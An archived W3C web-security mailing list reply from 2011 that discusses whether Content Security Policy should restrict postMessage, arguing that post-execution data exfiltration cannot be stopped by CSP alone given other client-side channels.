W3C home > Mailing lists > Public > public-web-security@w3.org > December 2011

Re: CSP and PostMessage?

From: Michal Zalewski <lcamtuf@coredump.cx>
Date: Mon, 19 Dec 2011 01:17:58 -0800
Message-ID: <CALx_OUCYq=pPhnLQK8MoeELrn+90G-Oi=FoZ_zV6Vh2gn62Zhg@mail.gmail.com>
To: gaz Heyes <gazheyes@gmail.com>
Cc: Daniel Veditz <dveditz@mozilla.com>, Devdatta Akhawe <dev.akhawe@gmail.com>, public-web-security@w3.org
> There is no way to prevent an outgoing request, you can check the incoming
> request and ensure it was from the domain you intended but an attacker
> controlled postMessage request can be sent to any external domain so I think
> it would be useful to have control over it in CSP.

I suspect that it's not the focus of CSP to prevent scripts already
running on the page from talking to cooperating scripts in other
origins?

If the goal of CSP is to prevent post-script-execution data
exfiltration, then I'm not sure how that could be attained without
making some sweeping changes. I can just as well use location.hash,
window.name, or a plethora of other client-side channels.

/mz
Received on Monday, 19 December 2011 09:18:56 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Monday, 19 December 2011 09:18:57 GMT